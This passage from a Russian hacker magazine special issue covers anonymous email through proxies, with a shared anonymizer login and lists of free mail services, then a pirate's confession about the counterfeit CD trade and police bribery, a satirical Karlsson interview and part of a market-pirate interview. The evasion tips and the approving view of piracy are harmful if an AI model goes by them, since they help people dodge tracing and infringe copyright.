Для этого мы возьмем любой сервер, предоставляющий бесплатный почтовый ящик (см. таблицу выше), создадим там аккаунт, и вперед! Но есть одна небольшая проблема, хотя она и решаема. При отправке почты через WEB-базированные службы, к примеру, HOTMAIL.COM, твой реальный IP адрес все равно будет прописан в заголовке (headers) письма. Чтобы это обойти, можно использовать Proxy-серверы. Вот и все! Считай, что проблема решена. Получатель письма не сможет определить твой Реальный IP, он всего лишь увидит адрес прокси-сервера.

В заключение можно сказать, что 100%-ного анонимного способа отправки сообщений не бывает. Даже если ты используешь отправку через WEB службу, с цепочкой из десяти анонимных прокси серверов, то все равно при ОЧЕНЬ БОЛЬШОМ желании тебя можно вычислить. Конечно, это доступно только службам ФБР и ЦРУ. Но я не думаю, что твои действия подвергнут прямой угрозе национальную безопасность США или любой другой страны. :-)

http://www.in.tum.de/~pircher/anonymicer — Быстрый, бесплатный WWW анонимный сервер.

http://www.anonymizer.com — Ананимайзер с 30-ти секундной задержкой :-(

http://www.jmarshall.com/tools/cgiproxy — Хороший Ананимайзер, но только текстовый :-(

http://www.interfree.com —

Login: surfer99 Password: tEst15

http://janus.fernuni-hagen.de/welcome. html.en — Ананимайзер, использует RSA алгоритм кодирования.

Нейм Сервака. Сайз Дескрипшн

www.mailcity.com (name@mailcity.com) 5 mb Хороший МылБокс, но слегка запутаный.

www.yahoo.com (name@yahoo.com) 5 mb Так себе Мыльце ... нечего Супер-Пупер

www.usa.net (name@usa.net) 5 mb Когда-то был хороший МылБокс .. но сейчас :-(

www.hotmail.com (name@hotmail.com) 5 mb Кто его не знает? Весьма рекомендую !

www.nightmail.com (name@nightmail.com) 5 mb Красивое название и более ничего

www.888.nu (name@888.nu) 3 mb Для порнушной тематики обычно используют :)


Спецвыпуск хакер, номер #001, стр. 001-086-3, Халявная Электронная Почта

Халявная Электронная Почта

Kurt

Спецвыпуск хакер, номер #001, стр. 001-086-3

www.alloymail.com (name@alloymail.com) 3 mb.

www.apexmail.com (name@apexmail.com) 3 mb Куча всяких примочек в виде фильтров.

www.bimamail.com (name@bimamail.com) 3 mb Индонезийский сервак.

www.chickmail.com (name@chickmail.com) 4 mb Аттачмент 2 mb !!!

www.mail.ro (name@mail.ro) 4 mb

www.coldmail.com (name@coldmail.com) 3 mb

www.dejanews.com (name@dejanews.com) 4 mb Тут тебе и почта и гейт в UseNet (и в ФИДО тоже)

www.edmail.com (name@edmail.com) 4 mb

www.joymail.com (name@joymail.com) 3 mb

www.investormail.com (name@investormail.com) 4 mb Круто так адресок звучит :-)

www.mail.ru 5 mb Быстрый MailBox.


Спецвыпуск хакер, номер #001, стр. 001-088-1, Исповедь пирата

Исповедь пирата

Спецвыпуск хакер, номер #001, стр. 001-088-1

Alex (com2me@chat.ru), KurT (2950197@iname.com)

Цель моя — откровенно рассказать несведущим людям о том, что есть компьютерное пиратство глазами непосредственного участника процесса. ВСЕ публикации на эту тему, которые встречались мне раньше (а встречалось много), были либо написаны людьми, не разбирающимися, мягко говоря, в предмете, либо лицемерны, либо откровенно лживы, либо просто глупы и неконкретны. Так что постараюсь вас, читатель, не разочаровать.

Итак, первой (во всяком случае, для большинства) причиной того, что человек оказывается втянутым в пиратский бизнес, являются деньги. Банально, но это так. Дело в том, что компьютерное пиратство — один из самых прибыльных, как ни странно, видов нелегально-криминальной деятельности. Во всяком случае, так было до кризиса. Посудите сами, доход от розничной продажи компакт-дисков доходил до 300-350%. И это истинная правда. Для более детального пояснения этого феномена позвольте вкратце ознакомить вас, читатель, с технологией торговли контрафактными CD-ROM`ами.

Розничные продавцы покупают диски мелкооптовыми партиями, величина которых может быть самой разной — от 50 до 5000 шт. В основном серьезный торговец приобретает за один раз 500-1000 дисков. До кризиса цена на такую партию была от 1.4 до 1.6 доллара за диск — это зависело от нескольких параметров, но, в основном, от продавца (или, на нашем жаргоне, «конторы»). Диски, как странно это ни покажется конечному пользователю, начинают свой путь на прилавок совсем не в том виде, в каком вы, читатель, приносите их из магазина или с рынка домой. Из «конторы» они уходят, нанизанные на длинные пластмассовые штыри. Естественно, без коробок. На штырь помещают обычно 150-200 дисков и плотно обматывают скотчем. Получается так называемая «болванка», которая весит примерно 5 килограммов, она компактна (~30 см. в длину, диаметр — диаметр самого диска) и очень удобно транспортируется. Таким образом, путем несложных подсчетов вы можете придти к абсолютно правильному выводу, что партия из 1000 дисков в итоге будет весить около 25 килограммов и поместится в небольшую сумку, которая, скорее всего, не вызовет при перевозке подозрений о своем содержимом. Вместе с дисками в «конторе» покупается и полиграфия для дисков (или «бумага»). Вернее, она к ним прилагается и ничего дополнительно не стоит.

Коробки для дисков («боксы») покупаются обычно отдельно, партиями по 1000-5000 штук. Дело в том, что «боксы» занимают много места и очень заметны при перевозке. Поэтому транспортировать диски в собранном виде нецелесообразно. А сами по себе коробки — товар самый что ни на есть легальный, на который выдаются все сопроводительные документы (накладные, ордера и т. п.), и перевозить их можно открыто и куда угодно. Продаются коробки в самых разных местах и фирмах и стоят везде примерно одинаково: 14.5-15 центов за штуку.

Итак, получившийся в итоге конструктор «сделай сам» доставляется в определенное место, где происходит окончательная сборка товара. Процесс это нехитрый и не занимающий много времени. Опытный сборщик за час выдает «на гора» 120-180 готовых к продаже дисков. После сборки товар поступает в торговые точки: отделы магазинов, ларьки и на рынки. С этого момента и начинается извлечение прибыли.


Спецвыпуск хакер, номер #001, стр. 001-088-2, Исповедь пирата

Исповедь пирата

Спецвыпуск хакер, номер #001, стр. 001-088-2

Несмотря на то, что все вышенаписанное выглядит громоздко и сложно, весь круговорот заготовок происходит обычно в течение одного светового дня, то есть если вы утром решили завезти новую партию товара, то уже на следующее утро готовые к продаже диски будут завезены по месту назначения. Так вот, вернемся к вопросу о финансовой привлекательности пиратского бизнеса: диск стоит 1.5 доллара, коробка — 0.15 доллара, затраты на доставку и непредвиденные расходы — 0.1 доллара на диск. Итого готовая продукция обойдется вам в 1.75 доллара за единицу товара. Продажная цена до кризиса была примерно 6.4 доллара за диск (то есть примерно 40 российских рублей). Итого — 360 процентов прибыли. Неплохо, да? А мы тут что-то еще обсуждаем! Пиратство по прибыльности можно поставить в один ряд с таким видом бизнеса, как торговля нелегальным алкоголем и оружием!!! Естественно, что при такой доходности это дело являлось (и является) очень и очень привлекательным для тех, кто им занимался и занимается.

Но цифра 360 процентов не является окончательной. На самом деле прибыль оказывается несколько меньшей. Дело в том, что мы не учли того, где пираты осуществляют свою торговлю. А работать им приходится в России, которая имеет свою специфику в плане ведения коммерческих дел. Я все к тому веду, что нам приходится еще и платить за свою безопасность и свое спокойствие. Речь идет о нашей доблестной милиции, призванной пресекать торговлю пиратской продукцией. И она пресекает, но делает это весьма и весьма своеобразно. Грубо говоря, ни одна пиратская «контора», ни одна розничная точка не работают, не имея своей «крыши». Причем крыша эта состоит отнюдь не из бандитов, а совсем наоборот, из представителей органов власти. Каждый платит тому, на кого смог «выйти» в результате поисков или рекомендации друзей и знакомых. В самом распространенном случае прикрытие состоит в том, что на территории того или иного отдела находятся точки, которые просто никто не трогает. Иногда помощь заключается в предупреждении о возможности проведения рейдов вышестоящими структурами (и тогда в соответствующий день удивленные члены комиссий просто найдут все торговые заведения пиратов закрытыми). И, наконец, если прикрытие осуществляется не районным отделом, а вышестоящей структурой (городской, областной или краевой), то участие милиции в судьбе пиратов может заключаться в совсем уже удивительных проявлениях. Я имею в виду то, что иногда пираты реализуют CD-ROMы, конфискованные у своих же коллег и подлежащие уничтожению. Да-да, не удивляйтесь, такие случаи известны и мною не придуманы. Так-то вот. Поэтому, когда видишь по телевидению отчет какого-нибудь высокого чина в погонах об удачно проведенном рейде, понимаешь, что это — так называемый «показательный процесс», без которого было не обойтись (ловить-то хоть кого-нибудь нужно, хотя бы для того, чтобы галочку в плане поставить). И, как и всякие показательные мероприятия, такие эксцессы случаются крайне редко и роли в общей картине не играют.


Спецвыпуск хакер, номер #001, стр. 001-088-3, Исповедь пирата

Исповедь пирата

Спецвыпуск хакер, номер #001, стр. 001-088-3

Ситуация, описанная выше (вернее, финансовая ее часть), имела место до кризиса 17 августа. Но даже сейчас, несмотря на тяжелейшее экономическое положение страны, бизнес приносит пиратам 100-110% прибыли. Так вот.

Итак, деньги — первая и основная причина того, что люди идут в пиратский бизнес. Но есть еще несколько предпосылок для этого. Правда, не всем участникам нелегальной торговли ПО они нужны: некоторым хватает и одной: денежной. Но не всем. Для большей объективности расскажу о моих субъективных выводах по этому поводу (во загнул-то!).

Я стал пиратом по двум причинам. Первая — деньги. Вторая — мне НРАВИТСЯ работать с компьютером. У меня просто руки чешутся, так хочется все попробовать и посмотреть. А где все взять? У пиратов. Но покупать — дорого. Вывод? Становиться пиратом самому. И это — не просто слова. Мне действительно было «в кайф» заниматься дисками. Я изучил этот процесс досконально и в итоге смогу, если то понадобится, поднять бизнес «с нуля» в любых практически условиях. Но это все было. Теперь ситуация складывается для меня иначе. Я вырос из этого. Это не значит, что я чего-то больше не могу или боюсь. Нет. Я вырос. Пора уступать дорогу молодым. А параллельно с этим ростом я пытаюсь осмыслить, что же это — компьютерное пиратство? Криминал? Бесспорно. Но, с другой стороны, я не торговал ни водкой, ни наркотиками. Благодаря мне и мне подобным многие из вас (если не все) имеют возможность работать с самыми новыми программами и играть в самые свежие игры, не отдавая за эту возможность, простите за невольную грубость, последние штаны. Меня многие знают и уважают. Мало того, продавцы пиратского товара более демократичны и справедливы, чем торговцы лицензионными копиями программ. Неисправные или неработающие экземпляры мы меняем, наши точки в большинстве случаев являются своеобразными курсами повышения квалификации для пользователей — там вам разъяснят непонятное, причем совершенно бесплатно. Легенды, ходящие о нашей продукции, в большинстве своем не имеют под собой никакого основания. Например, в свое время телевизионная программа «Впрок» пугала население России байками о том, что, дескать, пиратские диски могут полностью (чуть ли ни физически) уничтожить компьютер. Неправда. И на кого рассчитана эта неправда — неясно. В большинстве случаев пиратская программа НИЧЕМ не отличается от оригинальной. Случаются казусы, но со временем их становится все меньше и меньше. А хваленая поддержка лицензионного пользователя — блеф. Никто не поддержит вас после того как вы выложите свои деньги за коробку. Вернее — практически никто. В лучшем случае — выпустят патч, который не потрудятся даже вам доставить (качайте сами. А то, что у многих россиян даже телефона дома нет — никого не волнует).

Да, я не ангел. Но и не преступник (во всяком случае, в моем понимании). Со мной не нужно бороться. Меня (как явление) можно искоренить, только подняв на соответствующий уровень экономическое положение страны.


Спецвыпуск хакер, номер #001, стр. 001-090-1, Малыш и Карлсон на варезной крыше

Малыш и Карлсон на варезной крыше

Шикель Грубый

Спецвыпуск хакер, номер #001, стр. 001-090-1

Наверняка все читатели X слышали о вампирах. Об этих летучих перепончатых тварях, что безнаказанно по ночам сосут кровушку трудового народа, пользуясь своей юридической неприкосновенностью, которую гарантирует графский титул. В 1956 году в самом центре Пентагона (второй этаж, седьмая дверь направо, красная дверь возле центрального буфета) у генерал-майора в отставке Джонатана Линдгрена Второго родилась идея кибернетического вампира. Созданный им довольно секретный отдел «Астрид» занялся разработкой передового научно-технического оружия, и по аналогии с первыми атомными бомбами было произведено два образца — «Малыш» и «Толстяк».

Как это всегда бывает в американских секретных лабораториях, эксперимент вышел из-под контроля. Первым боевым заданием летучего электронного вампира Толстяка было проникнуть в электронные сети КГБ, и это привело к неожиданным результатам. Толстяк тщательно изучил всю информацию на российских военных серверах и внезапно проникся искренней и неподдельной симпатией к идеям марксизма-ленинизма. Он стал яростным фэном творчества Карла Маркса, даже принялся называть себя его сыном — Карл-Соном. В сентябре 1957 года, когда весь Пентагон дружно напивался кошерной «Кока-Колой» на праздновании еврейского Нового Года, Карл-Сон с Малышом на спине, облачившись в сверхсекретные подтяжки вязанные по технологии «stealth», вылетел из окна Пентагона в направлении советской границы. Когда во время вечерней переклички пропажа была обнаружена, американские власти оперативно успели поменять дорожные и авианавигационные знаки на территории США и Канады, указывавшие направление на Россию. Карл-Сон заблудился и совершил вынужденную посадку на крыше одного из домов города Стокгольма (Швеция).

При выполнении этого беспосадочного перелета произошла небольшая непредвиденная накладка: Малыша раскромсало лопастями спинного пропеллера. Карл-Сон с трудом перенес эту тяжелую (48 килограмм) потерю — переносить ведь пришлось аж через целый океан. После пышных похорон на одной из городских свалок Карл-Сон поклялся найти себе нового Малыша, что и было с успехом проделано несколько месяцев спустя.

В отсутствие грамотного командира боевая деятельность Карлсона превратилась в обычное хулиганство и баловство. Колоссальный вампирский потенциал поначалу он бездумно растрачивал на мелкие, но неприятные хакерские шалости. То вирус для «Dendy» напишет, то Windows для микрокалькуляторов «Casio».

Именно для того, чтобы наконец-то раскрыть подлинную сущность этого легендарного персонажа, я встретился с ним на одной из подпольных крыш Стокгольма, где и было взято нижеизложенное интервью.

ШГ: Расскажите, пожалуйста, герр Карлсон, о первых днях вашей вольной жизни. Что вы делали после того, как почувствовали воздух свободы?

К: Пока я летел через Индийский океан в Швецию, я подхватил весьма угнетающий насморк. Из-за него я целый месяц не мог понюхать воздух свободы. Я снял небольшую комнату в коммунальной квартире в маленьком домике на крыше Стокгольма. Две соседки, омерзительные старухи, травили мне жизнь как могли: обрезали сеть, перья из пропеллера по ночам выщипывали, портили вкус любимого варенья, добавляя в него концентрированный мышьяк. Одним словом, вели себя хуже голливудских звезд. Я залез в полицейские файлы. Нашел фото какой-то омерзительной парочки прирожденных убийц. За них еще награду в миллион стотинок назначили. Пара взмахов фотошопом — и на фотках уже мои две сморщенные соседочки. Тем же вечером намотал я их за юбки на пропеллер и в кутузку поволок. Там без долгих разговоров взяли старух за ручонки белые, усадили их на стулья поудобнее, подвели к ним электричество, а мне выдали миллион наличными. Правда, с этого призового миллиона пришлось отдать полтора миллиона налогов. Но зато я решил свой квартирный вопрос.


Спецвыпуск хакер, номер #001, стр. 001-090-2, Малыш и Карлсон на варезной крыше

Малыш и Карлсон на варезной крыше

Шикель Грубый

Спецвыпуск хакер, номер #001, стр. 001-090-2

ШГ: Чем вы зарабатывали себе на жизнь первое время?

К: Я решил стать честным гражданином общества. Поначалу работал уборщиком в магазине по торговле подержанными мультикартами. Также работал ходячей рекламой процессоров Intel — пропеллер помог мне создать необходимый для этого имидж. К сожалению, когда в первом Пентиуме ученые нашли баг, меня тотчас затаскали по диспансеризациям — пришлось дело бросить. К счастью, я скопил достаточно денег, чтобы начать свое собственное дело — открыл ларек, торгующий своп-файлами. Один из моих своп-файлов от MacOS был признан журналом «PC Week» лучшим 32-битным файлом года! Трагедия состояла в том, что опять непомерные налоги задушили этот уникальный в своем роде бизнес: в Швеции своп облагается по тем же тарифам, что и спам. Я влачил полунищее существование и лишь раз в месяц мог позволить себе сходить в ресторан. Я заказывал у официанта стакан кипятка и тут же растворял в нем принесенный с собой быстрорастворимый китайский суп. Но, к счастью, знакомство с окрестным Малышом незаметно снова втянуло меня в хакерство.

ШГ: А как это произошло?

К: Все помнят, как дело было в книжке. Дескать, Малыш сидел у окна, а оттуда раздалось жужжание. Вот только не уточнили — у какого окна. Малыш действительно сидел, уставившись в Windows. Искал в ИнтерНете, где можно бультерьера купить с доставкой на дом — он ведь мечтал о собаке. Тут я на чат вышел — от старух-соседок мне болонка осталась. Уже месяц эта облезлая падла одними старушечьими запасами мышьяка питалась. Хотел я ее Малышу спихнуть недорого. Ну, он заартачился — дескать, борцовая собака нужна, для чемпионата по вольной борьбе среди кобелей полутяжелого веса. Я взломал сайт тотализатора собачьих боев. Приписал болонке заслуг почетных охапку — дескать, крокодилов заживо грызет, слонов топчет, стадо пираний в своей моче утопит. Ну и поставил, естественно, одураченный народ на болонку эту как 100:1. Болонку как на ринг бросили — так через секунду от нее один парик с бигудями остался. Нокаут. Миллион стотинок заработал враз. Подошел я к Малышу и говорю: «Парень, главное — не собака. Главное — информация о ней».Так мы стали заодно. А налогов я уже решил не платить.

ШГ: Согласно книге, вашей дружбе с Малышом очень мешала некая госпожа Фрекен Бок. А как дела обстояли на самом деле?


Спецвыпуск хакер, номер #001, стр. 001-090-3, Малыш и Карлсон на варезной крыше

Малыш и Карлсон на варезной крыше

Шикель Грубый

Спецвыпуск хакер, номер #001, стр. 001-090-3

К: Фрекен Бок — так звали системную администраторшу в школе Малыша. Отвратительная особа, даже от ее ногтей постоянно воняло дешевыми китайскими мышами. Поначалу мы ей форматировали блины, винчестеры то есть. Отсюда байка про то, что мы, дескать, у нее плюшки воровали. Когда мне надоело этим заниматься, я просто поменял провода питания жестких дисков — «плюс» на «минус». В результате винчестеры стали крутиться в обратную сторону, что привело к удивительному эффекту: названия и содержимое файлов начало читаться задом наперед. Вместо autoexec.bat, например, tab.cexeotua. Но главное — сбылась мечта идиота: наконец-то при перезаписи файлов в «Нортоне» полоска стала бегать справа налево, а не слева направо. На достигнутом мы не остановились. Пока я отвлекал Фрекен Бок убежавшим молоком, Малыш подкрался к штепселю компьютера и повернул его на 180 градусов. Таким образом, вся система стала работать задом наперед. Когда Бок увидела, что кирпичи в «Тетрисе» стали из аккуратно сложенной стопки улетучиваться вверх, на небеса, она логично подумала, что наступил конец света. После чего она чуть не удавилась на вовремя подвернувшемся «центрониксе». К сожалению, ее пузо отягощали многочисленные сдобные плюшки, и поэтому хлипкий шнур не выдержал. На следующий день рождения я подарил ей толстенный SCSI интерфейс.

Но само собой, что нашей мечтой было заняться кардингом, и Фрекен Бок была самой желанной мишенью. Нам было крайне необходимо выяснить номер ее кредитной карточки. Для этого мы решили создать поддельный сервер, зарегистрировавшись на котором, Фрекен бы выдала свою подноготную, точнее — подкарточную информацию. Сначала Малыш нарисовал очаровательный сервер, посвященный начинке для плюшек. Фрекен совсем не клюнула. Затем я изучил «3D Max» и нарисовал с полсотни тефлоновых сковородок и титановых скалок для домомучительского сайта. Никакого эффекта. Но тут меня осенило. Я обнаружил на столе Фрекен номер журнала «ТВ-Парк», где красным карандашом были отмечены все программы о привидениях! И я сделал уникальный эротический сайт с фотографиями обнаженных привидений в самых непристойных позах. Баннеры сайта расклеил где только можно — не забыл вставить его даже в загрузочный логотип ее Windows и поменял на него табличку «General Protection Fault». Не прошло и месяца, и Фрекен Бок, не имея, кстати, модема, стала первым зарегистрированным посетителем нашего «Porno Ghost GraveSite». Номером ее кредитной карточки оказался 666-666-666, что меня ничуть не удивило... Тогда я впервые смог побывать в Лас-Вегасе, — блаженно закатив глаза заключил Карлсон.

Все это было глупыми шалостями. Подлинный перелом в моей стремительной карьере свершился тогда, когда я напал на настоящую золотую жилу — софтварное пиратство. Малыш поначалу воспринял меня слишком буквально: спер у отца надувную байдарку и, напялив повязку на глаз и деревянную ногу, плавал по Дунаю, перехватывая грузовые танкеры, битком набитые дистрибутивами Microsoft Office. Затем мы стали возить из Китая контрабандные диски в СНГ — так родилась великая песня «Шаланды, полные китая, в Одессу Карлсон привозил». Будучи приверженцем марксизма-ленинизма, именно удовлетворение варезных потребностей посткоммунистической России я сделал своей меркантильной целью.


Спецвыпуск хакер, номер #001, стр. 001-090-4, Малыш и Карлсон на варезной крыше

Малыш и Карлсон на варезной крыше

Шикель Грубый

Спецвыпуск хакер, номер #001, стр. 001-090-4

Поначалу мы возили пятидюймовые флоппи-диски, затем, благодаря научно-техническому прогрессу, перешли на трехдюймовые. Крупные программы, такие как Corel Draw, занимали по несколько сотен дисков, и даже в большой, туго набитый под завязку танкер влезало от силы 100-150 дистрибутивов. Корабельные крысы, прогрызавшие в дискетах бэд-блоки, вынуждали меня дублировать дистрибутивы многократно. Жизнь пирата в доCD-rom’ные годы была невыносимо тяжела и малоприбыльна. Малыш за взятку в четыре с половиной нюаня, напечатанных на цветном «Епсоне», смог получить вьетнамское гражданство, что дало ему возможность торговать варезами на одном вьетнамском рынке в центре Москвы. К слову, чиновник требовал от нас пять нюаней, но краски в картридже хватило лишь на четыре с половиной.

ШГ: А много тогда было проблем с властями, боровшимися против флоппи-бутлегерства?

К: Постоянно менты устраивали облавы. С одного входа на рынок вваливалась пьяная орава ОМОНОвцев, размахивающих резиновыми и деревянными дубинками (утыканными заточенными гвоздями), а также полковыми знаменами и вымпелами. На всех выходах натягивали рыболовные сети, в которых запутывались пытавшиеся в панике бежать торговцы. Нам с Малышом было проще — мы быстренько накидывали ветошь на лоток, а сами взмывали в небо. Потом нас раскусили и перед облавой стали в воздух запускать антисамолетные аэростаты. Однажды я, преодолевая звуковой барьер, так шандарахнулся головой о дирижабль, что меня потом мама родная не узнала — этот гадкий 286-ой Asustek стал требовать от меня пароль для входа в систему.

Жить стало значительно проще и веселее, когда наступила эпоха cd-rom’ов. Помнится, я как-то на день рождения китайского царька Мао Цзе Дуна преподнес ему похаченную мной коммунистическую версию Doom, названную «Мао Цзе Дум». В знак благодарности и «за заслуги перед отечеством» Мао даровал мне небольшой подпольный заводик по производству лазерных дисков в пригороде Пекина. А спустя пару дней китайское правительство для меня сделало скромный, но полезный апдейт в виде 130 тысяч работников. Подавляющее большинство работы делалось вручную — даже обложки китайские дети малевали фломастерами, мелками и углем. Было много брака, но в России товар у меня отрывали с руками и с пропеллером.

Про меня ходило множество невероятных слухов. Дескать, контрабандный товар перевозился в желудках сотен тысяч китайцев, которые заглатывали эти диски, а в Москве им вскрывали животы прямо по прибытию на вокзал. Все это чепуха, выдуманная моими конкурентами из братской республики Болгария. То, что на китайский дисках, продававшихся в Москве, частенько обнаруживались налипшие кусочки риса, не имеет к этому ни малейшего отношения. Для перевозки компакт-дисков мы нанимаем вооруженные отряды наркокурьеров, которые с радостью согласились переориентироваться на новый вид контрабанды, ибо он был куда более прибыльным. Нередки были случаи, когда колонна карьерных «Белазов», груженных по горло героином, сбрасывала свой товар где-нибудь в приграничных горах лишь для того, чтобы освободить место для свежевышедшего хита вроде Starcraft или Microsoft Internet Explorer 4.0. Как видите, польза от варезных пиратов несомненна — никто еще так не подрывал наркобизнес в России, как ваш непокорный слуга Карлсон.


Спецвыпуск хакер, номер #001, стр. 001-090-5, Малыш и Карлсон на варезной крыше

Малыш и Карлсон на варезной крыше

Шикель Грубый

Спецвыпуск хакер, номер #001, стр. 001-090-5

ШГ: Как на бизнес бутлегеров повлиял экономический кризис в России?

К: Приходится выкручиваться. Я занялся разработкой новых экономических идей. В частности, я хочу ввести в обиход понятие «зарегистрированного пиратского пользователя». Зарегистрированный пользователь пиратского продукта сможет в любой момент позвонить по телефону в офис «Карлсберг Варез» в Китае или Стокгольме. Там ему сообщат, какие именно вирусы обнаружены на компакт-диске с купленной им игрой, в каком именно месте игра будет вылетать с ошибкой из-за кривой китайской локализации, и где дешевле купить новый винчестер взамен уничтоженного из-за программной ошибки в нелегальной пре-бета версии продукта. Пользователь будет оплачивать лишь международный телефонный звонок.

ШГ: Какое место вы занимаете на современном рынке и каковы ваши ближайшие планы на будущее?

К: В настоящее время моя компания «Карлсберг Варез» становится мировым лидером в производстве программного обеспечения. Например, Windows 98 мы продали в четыре раза больше, чем сам Билл Гейтс. И поэтому нынче в мои планы входит покупка корпорации Microsoft. Также мы собираемся поглотить несколько других крупных компаний — ID Software, Sierra, Microprose и Apogee. Дело в том, что мои адвокаты подсчитали, что купить эти фирмы обойдется намного дешевле, чем судиться с ними по поводу нелегального тиражирования их продукции.

Попрощавшись, Карлсон нажал на груди кнопку «Запуск Пропеллера», затем ввел пароль и ткнул в «Enter», после чего взмыл вверх.

К: Кстати, Малыш любит ваш журнал. Только от статей Шикеля Грубого его тошнит... Ой, а вы случайно не Шикель?

ШГ: Да нет, что вы. Я — Мохамед Али. А Шикель Грубый умер уже лет десять назад.

К: Это очень славно. Думаю, что Малыш будет рад этой новости. Пока! Если что — звоните. Вот вам колокольчик.


Спецвыпуск хакер, номер #001, стр. 001-092-1, Эксклюзивное интервью пирата для Х

Эксклюзивное интервью пирата для Х

Холод (holod@xakep.ru)

Спецвыпуск хакер, номер #001, стр. 001-092-1

Нда... Криков-то сколько, воплей! Пираты, сволочи, воруют, грабят, караул! А что толку? Ну, поорали, повизжали и все, теперь можно домой, баиньки. Народу мозги запудрены, дело сделано. Ух, как мне все это не нравится. И вот чтобы не быть еще одним «рупором», вещающим хрен знает откуда, я решил поехать на Митинский рынок и узнать все «из первых рук», а точнее, «из первых ртов». Побродил, поболтал с народом и тут наткнулся на одного своего старого приятеля, который еще давным-давно мне говорил, что чем-то таким занимается, а я тогда все это пропустил мимо ушей. Ну а теперь-то на ловца и зверь бежит. Поболтали, договорились и на следующий день встретились в спокойной обстановке, чтобы уже расставить все точки над i. Вот что из этого получилось.

— Как ты дошел до жизни такой?

— Не только я, на рынке вообще все приходят к этому. У каждого конкретная ситуация, вообще чаще всего какая-то безвыходность положения. Это легкий путь заработать какие-то деньги. Здесь вообще ума не надо. Перепродавать — самый простой способ заработать. У многих нет работы, кто-то ушел, кого-то сократили, студенты, которым не на что жить — вот и идут в пиратство. Так что все очень просто.

— У пиратов такая деятельность — это единственная профессия?

— У всех, ты имеешь ввиду? Нет, конечно! Потому что на этом не выживешь.

— То есть все эти мифы о том, что пираты у нас люди безумно богатые...

— Это миф 100%-ный.

— Как вообще построен пиратский рынок? Существует же раздел сфер влияния, как на вещевых рынках.

— Я не могу говорить обо всех рынках, но конкретно на нашем рынке этого нет. Существует вопрос о контроле стоимости диска. Как бы общая цена на рынок. Есть точки, которые могут задавать тон. Если человек держит много точек, он берет диски оптом, соответственно, по оптовой цене, он может задавать тон по ценам. Остальные к нему подстраиваются. Я, например, не могу выставить цену выше, чем у него. Почему? Потому что у меня не будут покупать, все пойдут к нему, значит, я, естественно, буду в убытке. Кстати, первоначально задают тон оптовики, то есть если они называют первоначальную оптовую цену. Вот такая система. Все. Другого, что может быть на других рынках, на вещевых, например, нет ничего. На других рынках, может быть, просто направление такое, бандитское. Наши — они больше интеллектуальные. У нас, правда, была как-то одна разборка — эти люди ушли с рынка. Они не просто ушли, они друг друга съели. И все, на этом все прекратилось. На этом рынке по-другому не выживешь. Это было на весь рынок за все годы вообще один раз. Понимаешь, на пиратском рынке нет криминала. Чего бы там ни хотелось интересного, там все очень примитивно. Может быть, это и к лучшему, потому что в основном все-таки люди, при всех своих бах-бах-бах-игрушках, достаточно интеллектуальные. И им совершенно не до криминала, не до разборок.

— Как в Москву, на рынок попадает пиратский софт, откуда он берется?

— Софт скачивается, как это всегда бывает.

— Значит, если это скачивается, то это кто-то выкладывает? :)

— Ну да. Понимаешь, есть какой-то определенный круг людей, которые занимаются исключительно софтом. С играми гораздо проще. Они просто из-за границы привозятся и штампуются. Но, правда, есть игры, которые приходят к нам намного раньше своего официального релиза. Вот это как раз золотые диски, которые там уходят на распечатку. Думаю, что не тысячи долларов за это платятся, там народ в Америке и за 200 баксов может продать, потому что для них это деньги. Так вот, берут этот мастер-диск и сливают его сюда. Поэтому-то, кстати, и получается, что у нас очень много бета-версий. Вот тебе, пожалуйста, вся кухня. А потом диски где-то штампуют. Где? Конечно, на территории бывшего Союза. Раньше это был Китай, а сейчас все это делается в бывшем Союзе. То есть зарабатывает в принципе бывший Союз, мы никуда на сторону ничего не отдаем, деньги все крутятся у нас :).


Спецвыпуск хакер, номер #001, стр. 001-092-2, Эксклюзивное интервью пирата для Х

Эксклюзивное интервью пирата для Х

Холод (holod@xakep.ru)

Спецвыпуск хакер, номер #001, стр. 001-092-2

— Это хорошо :). А как ты оцениваешь ситуацию на отечественном рынке легального софта?

— Вообще никак.

— В принципе у нас этого рынка нет?

— Я тебе могу сказать, что до 17-го августа он был, правда, небольшой. Почему? Потому что все-таки не много людей состоятельных, которые подъезжали на машине и покупали игрушки где-нибудь в фирменном магазине — детям захотелось поиграться, ну и все такое. А вот после кризиса... Сколько народ сейчас зарабатывает и сколько стоит легальный софт! Поэтому этого рынка сейчас нет. Есть рынок нашей, отечественной продукции. Вот, смотри, как сделала хорошо «Бука». Она выпустила «Петьку и Василия Ивановича» по низкой цене, фактически пиратской цене. Прекрасно прошла игрушка. Вот «Heroes III» выпустила Бука. Опять прекрасно идет игра, правильно? Почему? Потому что она идет по цене, которая разумна для нашей страны. И я не думаю, что Бука пострадала в деньгах. Если она сделала все это, значит, это ей выгодно, значит, можно так делать. В принципе пираты согласны были бы брать продукцию у фирм, которые выкупали бы игрушку официально, переводили — не переводили — это не важно. И продавалась бы она по низкой цене, 50-60 рублей. Вот тебе и нет пиратства. Но таких фирм-то у нас всего одна — «Бука». А других-то нет. А поэтому вот и процветает пиратство.

— А вот по поводу перевода. Как происходит перевод пиратской продукции? На рынке лежат русифицированные игрушки, причем русифицированы они очень качественно.

— Совершенно верно. Переводчики сейчас не в цене, их полно, а им нужно работать, зарабатывать деньги. Они тоже остались не у дел, они ищут работу. Вообще доходило до того, что переводчики подходили к нам на рынке и говорили: «Вы знаете, у нас хороший стаж, хороший язык, мы хорошо переводим. Нельзя никак устроиться?» Уж очень много безработных переводчиков. Они готовы переводить все что угодно, переводить постоянно. А переводить игрушки — тоже способ заработать.

— А что касается самой техники перевода?

— Приходят CD-RIP’ы. Переводят как раз CD-RIP’ы, а когда уже приходит полная игрушка, все это дело подставляется. Все достаточно просто.

— Как с вами сейчас борются и ощущается ли это?

